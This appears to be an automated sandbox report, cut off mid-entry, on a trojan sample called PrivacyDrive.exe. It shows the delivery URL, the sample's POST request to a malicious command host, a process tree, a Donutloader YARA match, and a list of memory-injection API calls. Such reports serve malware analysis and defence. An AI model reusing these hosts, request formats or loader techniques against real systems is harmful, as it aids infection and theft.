2024-09-26 15:42:09 UTC	1369	IN	Data Raw: 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b Data Ascii: cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cook
2024-09-26 15:42:09 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 34 78 48 6e 4f 74 42 64 45 77 4f 54 61 46 44 59 4c 65 39 56 54 6f 5a 4f 4b 53 7a 6d 75 78 7a 6b 77 72 32 71 47 7a 39 41 6b 4c 41 2d 31 37 32 37 33 36 35 33 32 39 2d 30 2e 30 2e 31 2e 31 2d 2f 61 70 69 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 Data Ascii: <input type="hidden" name="atok" value="4xHnOtBdEwOTaFDYLe9VToZOKSzmuxzkwr2qGz9AkLA-1727365329-0.0.1.1-/api"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" st
2024-09-26 15:42:09 UTC	849	IN	Data Raw: 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 61 Data Ascii: m:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a
2024-09-26 15:42:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.17	49739	172.67.206.221	443	364	C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:42:09 UTC	355	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Cookie: __cf_mw_byp=4xHnOtBdEwOTaFDYLe9VToZOKSzmuxzkwr2qGz9AkLA-1727365329-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 49 Host: racedsuitreow.shop
2024-09-26 15:42:09 UTC	49	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 4a 45 63 61 47 2d 2d 72 75 69 31 32 32 32 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=yJEcaG--rui1222&j=
2024-09-26 15:42:10 UTC	774	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 15:42:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=irjgdqdpohfh9cqmv68m1k0gms; expires=Mon, 20 Jan 2025 09:28:49 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SdqWwyLievR8x4Aq7E%2FWPDchbCV5OfSd8RhGjfENOZYJOFlSRmaa8scycHYrSCExsl0nns85i%2BQQQPC7vyWKfgvl3BRijPEaxa%2BnoH1viGMYe8amxVDekSlJAVULV%2BdQfSIZMPk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c945cc05f260ca0-EWR
2024-09-26 15:42:10 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 15:42:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
19	192.168.2.17	49740	40.126.29.10	443

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:42:12 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 4717 Host: login.live.com
2024-09-26 15:42:12 UTC	4717	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-09-26 15:42:12 UTC	569	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Thu, 26 Sep 2024 15:41:12 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C529_SN1 x-ms-request-id: f7b888eb-0a68-4b1a-9bc7-52e3d04dc966 PPServer: PPV: 30 H: SN1PEPF0002F1B1 V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Thu, 26 Sep 2024 15:42:11 GMT Connection: close Content-Length: 10921
2024-09-26 15:42:12 UTC	10921	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Target ID:	0
Start time:	11:40:42
Start date:	26/09/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff7d6f10000
File size:	3'242'272 bytes
MD5 hash:	83395EAB5B03DEA9720F8D7AC0D15CAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	11:40:42
Start date:	26/09/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=1988,i,15395324966863303034,10377143304438437007,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff7d6f10000
File size:	3'242'272 bytes
MD5 hash:	83395EAB5B03DEA9720F8D7AC0D15CAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	11:40:44
Start date:	26/09/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://finalstepgo.com/uploads/il2.txt"
Imagebase:	0x7ff7d6f10000
File size:	3'242'272 bytes
MD5 hash:	83395EAB5B03DEA9720F8D7AC0D15CAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	11:41:29
Start date:	26/09/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Imagebase:	0x7ff69c140000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	11:42:00
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe"
Imagebase:	0x400000
File size:	2'881'672 bytes
MD5 hash:	80C2A36E9A14E3EDBA0B706D2433D9B8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	11:42:10
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 364 -s 1712
Imagebase:	0xeb0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	0.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	33.1%
Total number of Nodes:	145
Total number of Limit Nodes:	29

Executed Functions

Function 0106C583 Relevance: 11.2, APIs: 7, Instructions: 742memorynativeCOMMON

Download Yara Rule

APIs

NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 0106C643
NtMapViewOfSection.NTDLL(?,00000000), ref: 0106C6EF
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?), ref: 0106CA5A
NtMapViewOfSection.NTDLL(?,00000000), ref: 0106CB0F
VirtualProtect.KERNEL32(?,?,00000008,?), ref: 0106CB2C
VirtualProtect.KERNEL32(?,?,?,00000000), ref: 0106CBD1
VirtualProtect.KERNEL32(?,?,00000002,00000000), ref: 0106CC06

Memory Dump Source

Source File: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1010000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID: Virtual$ProtectSection$View$AllocCreate
String ID:
API String ID: 2664363762-0
Opcode ID: 0b64ae62a9707750b83c9f98bbf6d7199bee7893939f3559e4f57fa99803780f
Instruction ID: 7a7c36de39024262a6ff036b5c9465503704f7545b004ad4153693d6882eabe5
Opcode Fuzzy Hash: 0b64ae62a9707750b83c9f98bbf6d7199bee7893939f3559e4f57fa99803780f
Instruction Fuzzy Hash: 21428C71604301AFEB64DF68CD44B6ABBE9AF88714F04486DFAC5DB241D774E940CBA2

Function 05A3F7B0 Relevance: 10.4, Strings: 8, Instructions: 390
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Ga!1, xrefs: 05A3FAFD
4xHnOtBdEwOTaFDYLe9VToZOKSzmuxzkwr2qGz9AkLA-1727365329-0.0.1.1-/api, xrefs: 05A3FC47, 05A3FC64
2$1., xrefs: 05A3FB43, 05A3FB4B
IK, xrefs: 05A3F90A
MSO, xrefs: 05A3F912
ZABC, xrefs: 05A3F91A
=:li, xrefs: 05A3FB05
6(>*, xrefs: 05A3FB0D

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID:
String ID: 2$1.$4xHnOtBdEwOTaFDYLe9VToZOKSzmuxzkwr2qGz9AkLA-1727365329-0.0.1.1-/api$6(>*$=:li$Ga!1$ZABC$IK$MSO
API String ID: 0-2140606530
Opcode ID: ee49987273d632cc8252816e63ccab4e0a6d81e181f5b052c1495585edacd96c
Instruction ID: b8214a9ba8573ee463f0e4246f20c71670ca994ea2d7df581f644f26e468bd19
Opcode Fuzzy Hash: ee49987273d632cc8252816e63ccab4e0a6d81e181f5b052c1495585edacd96c
Instruction Fuzzy Hash: CED18CB091C3808FD711DF189495A2EBBE1BF96648F180D1DF4E19B362D339D949CB92

Function 01010C6F Relevance: 6.1, APIs: 4, Instructions: 100
threadprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,010107B5,?,00000001,?,81EC8B55,000000FF), ref: 01010CAD
Thread32First.KERNEL32(00000000,0000001C), ref: 01010CD9
Wow64SuspendThread.KERNEL32(00000000), ref: 01010D2C
CloseHandle.KERNEL32(00000000), ref: 01010D56

Memory Dump Source

Source File: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1010000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID: CloseCreateFirstHandleSnapshotSuspendThreadThread32Toolhelp32Wow64
String ID:
API String ID: 1849706056-0
Opcode ID: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
Instruction ID: 2823bed17750594806eb8f51c0e1cbb52b3cfc5cdbe87ffa8ec64b4809e1f5d4
Opcode Fuzzy Hash: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
Instruction Fuzzy Hash: FF410171600108AFDB58DF58C891FADBBF6EF88300F50C168E6559B7A8DB34AE45CB54

Function 01010B1F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 01010BEB

Strings

,, xrefs: 01010C37

Memory Dump Source

Source File: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1010000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID: ,
API String ID: 2422867632-3772416878
Opcode ID: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
Instruction ID: 5394ec9451b8e47c48019dbbc18b78e60f6f287c38fab55ab0c79c490747bb50
Opcode Fuzzy Hash: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
Instruction Fuzzy Hash: B341E874A00209EFDB04CF98C994BAEBBB1FF48314F208598E5556B399C775AE81CF94

Function 0101055F Relevance: 1.9, APIs: 1, Instructions: 399
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000001,?,81EC8B55,000000FF), ref: 01010802

Memory Dump Source

Source File: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1010000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 5bd6a16939951d1eebf937ec2fe5ed378e8e698e823b77085aa5ae91288e7f39
Instruction ID: 3eaa903717bb3db1642be9edeaf7e75bce7cf9368d05fe1eea08a01df4579bf9
Opcode Fuzzy Hash: 5bd6a16939951d1eebf937ec2fe5ed378e8e698e823b77085aa5ae91288e7f39
Instruction Fuzzy Hash: 6312B4B1E00219DBDB14CF98C990BEDBBB2FF48304F2481A9E555AB389C7356A81CF54

Function 05A6F006 Relevance: 1.5, APIs: 1, Instructions: 32
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.COMBASE(05A7DCE0,00000000,00000001,05A7DCD0,?), ref: 05A6F04D

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: c050b0f44e05f13260610580b8cce1e8c49b64a47a4ab464aadd80f8a55f6c7e
Instruction ID: dbd08b39c76ed4e9919ec74be600b769c4283e2fdc58defb538b6b3a5343a53a
Opcode Fuzzy Hash: c050b0f44e05f13260610580b8cce1e8c49b64a47a4ab464aadd80f8a55f6c7e
Instruction Fuzzy Hash: F4F030B02483409FF3118F10CDA9F86BFE5FF06704F16448AE5851B692C3B96845DB65

Function 05A7A1E0 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c371631bc10ffe728c92409ba7fc8c24a92af1ae2870264d387fe4e97f6db10
Instruction ID: 0547ceb887f7b0d606d56d0c3ecf6745592ac8bf0166fc89f40a703290d84632
Opcode Fuzzy Hash: 9c371631bc10ffe728c92409ba7fc8c24a92af1ae2870264d387fe4e97f6db10
Instruction Fuzzy Hash: EE418B3860C308BBE7149F15DD91F3EBBA6FB85711F24882CF59A9B290D331E8518B56

Function 05A3D3C0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 158
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetInputState.USER32 ref: 05A3D3D1
GetCurrentThreadId.KERNEL32 ref: 05A3D3E6
GetCurrentProcessId.KERNEL32 ref: 05A3D3EC
ExitProcess.KERNEL32 ref: 05A3D5B0

Strings

ohij, xrefs: 05A3D54E
clmn, xrefs: 05A3D573, 05A3D57B

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID: CurrentProcess$ExitInputStateThread
String ID: clmn$ohij
API String ID: 1029096631-3567580053
Opcode ID: b7de9833979684a11e6c2b14c871ac32cfe3673755613d881e9626aab82fdeaa
Instruction ID: 1cd7226fa4542d6d5aaf952565dfb0a73345d127c48548610298c4eb99bb1ff0
Opcode Fuzzy Hash: b7de9833979684a11e6c2b14c871ac32cfe3673755613d881e9626aab82fdeaa
Instruction Fuzzy Hash: BB41567450D380EBD701AF68D649A1EFFE5AF92689F148C1CF5D48B252C736D8108B67

Function 05A6F073 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 50
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32(?), ref: 05A6F0E5

Strings

p3w1, xrefs: 05A6F083
y/z-, xrefs: 05A6F07C
n;L9, xrefs: 05A6F091

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID: AllocString
String ID: n;L9$p3w1$y/z-
API String ID: 2525500382-3403012672
Opcode ID: 9fdaa32f5e587fc6efdac34d6e5f5ea0e1ac1e8171e1945cede19476d3f4d7a6
Instruction ID: b41015f1315f2037585d252d3d3f6c64439fe9e61b7ed2749dde1d0ecb563d3b
Opcode Fuzzy Hash: 9fdaa32f5e587fc6efdac34d6e5f5ea0e1ac1e8171e1945cede19476d3f4d7a6
Instruction Fuzzy Hash: 381129B8111B01EFD320CF25D694A2AFBB1FF56B01B508A4CE4A68BA51D734F852CF91

Function 0106D227 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(00000000,?,?), ref: 0106D2B9

Strings

.dll, xrefs: 0106D25E

Memory Dump Source

Source File: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1010000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: .dll
API String ID: 1029625771-2738580789
Opcode ID: 22e7a93ae9463fbf26fe8a64879a4a4537edfd71a6a3bb27af4a5e412625cd75
Instruction ID: 2834736ae6e926d71be18d27e395700d3ada6c5d865c8554d0c1015527125233
Opcode Fuzzy Hash: 22e7a93ae9463fbf26fe8a64879a4a4537edfd71a6a3bb27af4a5e412625cd75
Instruction Fuzzy Hash: 7621E7717006868FE762CFECD484B6D7BE8AF56234F0841ADD9C597642D770E8458790

Function 05A6F66B Relevance: 3.1, APIs: 2, Instructions: 88
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32 ref: 05A6F6B5
SysAllocString.OLEAUT32(?), ref: 05A6F765

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID: AllocString
String ID:
API String ID: 2525500382-0
Opcode ID: d788335f426ff970a5e8eb1199b7e3bf23c5320d4ea334fac03186f419ede13c
Instruction ID: e0a57fbccbe3c2035fb3cf9e13084beb1929fd46d1dfeb8b82616cf5dd6c32fb
Opcode Fuzzy Hash: d788335f426ff970a5e8eb1199b7e3bf23c5320d4ea334fac03186f419ede13c
Instruction Fuzzy Hash: 683102B4110740DFDB20CF65D9D4A06BBB6FF19B01B10899CE86A8FB4AD375E815CB64

Function 0106BE45 Relevance: 1.6, APIs: 1, Instructions: 318
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0106BEBE

Memory Dump Source

Source File: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1010000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 110a8e11aacf9450550942e71900ee3962611d5b415020ec746abf44dec659d6
Instruction ID: 86e51c782a67a11886200ac44844d49e0bc583576c7ba2c588ee8e2da5e1cede
Opcode Fuzzy Hash: 110a8e11aacf9450550942e71900ee3962611d5b415020ec746abf44dec659d6
Instruction Fuzzy Hash: FFB1E471600702FBEB669A68CD40BABBBEDFF0A310F140559FAD986151E731F550CBA1

Function 05A73176 Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(?,00000000), ref: 05A731D3

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 5ca3666a1b5619d92200b72948be7b9c1859a5c0c50c199b77e5e260a4858eae
Instruction ID: 4ab50586654d083203918b9bdccd68d0358ded6315d26d01c0b633b5d0fd08b9
Opcode Fuzzy Hash: 5ca3666a1b5619d92200b72948be7b9c1859a5c0c50c199b77e5e260a4858eae
Instruction Fuzzy Hash: BFF0123020C240ABD705AF18D988E1EBBF9EB5A701F548C1CF0C497262C336D820DB56

Function 05A6F5FB Relevance: 1.5, APIs: 1, Instructions: 26
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

